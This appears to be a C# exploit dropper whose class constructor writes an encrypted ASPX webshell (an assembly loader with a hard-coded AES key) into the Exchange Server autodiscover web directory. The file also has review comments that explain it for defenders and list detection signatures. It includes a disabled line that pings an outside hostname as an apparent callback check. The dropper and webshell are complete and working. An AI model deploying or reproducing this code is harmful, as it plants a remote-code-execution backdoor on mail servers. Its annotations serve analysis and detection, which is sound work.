﻿using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Text;

namespace exploit
{
    // Review note (defender's reading): this type is a file dropper. All of its work is done
    // in the constructor, so merely instantiating the class performs the write below; no
    // method call is required. How the type gets instantiated on a target is not shown in
    // this file.
    class ExploitClass
    {
        // Builds the source of an ASPX page in memory and writes it to a fixed path under the
        // Exchange Server "ClientAccess\autodiscover" web directory. Any exception raised by
        // the write is swallowed, so the constructor never throws.
        public ExploitClass()
        {
            
            // ASPX page source written to disk verbatim. Read as code, the page does this:
            //   1. Takes a hard-coded 16-character key and uses its bytes as BOTH the key and
            //      the IV of a RijndaelManaged transform.
            //   2. Reads the whole request body (BinaryRead of ContentLength) and decrypts it.
            //   3. If Session["payload"] is null, it looks up Assembly.Load(byte[]) through
            //      reflection, loads the decrypted bytes as an assembly and caches that
            //      Assembly object in the session.
            //   4. Otherwise it creates an instance of type "LY" from the cached assembly,
            //      hands it Context and the decrypted bytes through Equals(), base64-decodes
            //      the object's ToString(), encrypts the result with the same key/IV and
            //      writes it to the response.
            //   5. Wraps everything in catch(System.Exception){} so the page emits no error.
            // In effect this is an in-memory assembly loader reachable over HTTP: whoever holds
            // the key can run arbitrary .NET code in the web application.
            // NOTE(review): the "payload" session key, the "LY" type name and the Equals()
            // calling convention resemble publicly documented ASPX webshell loaders; confirm
            // against your own signature set before attributing.
            // Detection: the literals above (key string, Session["payload"], CreateInstance("LY"),
            // reflective GetMethod("Load", byte[])) are stable content signatures for scanning
            // web roots, and requests to the dropped page carry an opaque binary body.
            string data = "<%@ Page Language=\"C#\"%><%try{string key = \"1a1dc91c907325c6\";" +
                "byte[] data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encodin" +
                "g.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(Context.Reque" +
                "st.BinaryRead(Context.Request.ContentLength), 0, Context.Request.ContentLength);if (Context.Session[\"" +
                "payload\"] == null){ Context.Session[\"payload\"] = (System.Reflection.Assembly)typeof(System.Reflection." +
                "Assembly).GetMethod(\"Load\", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data });}e" +
                "lse{ object o = ((System.Reflection.Assembly)Context.Session[\"payload\"]).CreateInstance(\"LY\"); o.Equals(" +
                "Context); o.Equals(data);byte[] r = System.Convert.FromBase64String(o.ToString());Context.Response.BinaryWrit" +
                "e(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(ke" +
                "y), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length));}}catch(System.Exception){}%>";
            
            try
            {
                // Action performed on instantiation.
                // The commented-out line below is a disabled alternative that would start
                // ping.exe against an external hostname instead of writing a file; presumably
                // an out-of-band execution check. The hostname is an indicator worth searching
                // for in DNS and proxy logs.
                //System.IO.File.WriteAllText(@"C:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\autodiscover\Services.aspx", data);
                //System.Diagnostics.Process.Start("ping.exe tt.izi4b6.tweb.email");
                // Writes the page into a directory served by the Exchange web front end
                // (the V14 path presumably corresponds to Exchange Server 2010; verify).
                // Defensive checks: compare this directory against a known-good install
                // baseline, monitor it with file-integrity tooling, and alert when the web
                // or Exchange service processes create or modify .aspx files. Write access
                // for the service identity to this path is what makes the drop possible.
                System.IO.File.WriteAllText(@"C:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\autodiscover\Services.aspx", data);
            }
            catch (Exception)
            {
                // Deliberately empty: a failed write (missing path, no permission) produces no
                // error from this code, so investigators should rely on file-system and
                // process telemetry rather than application exceptions.
            }
        }
    }
}
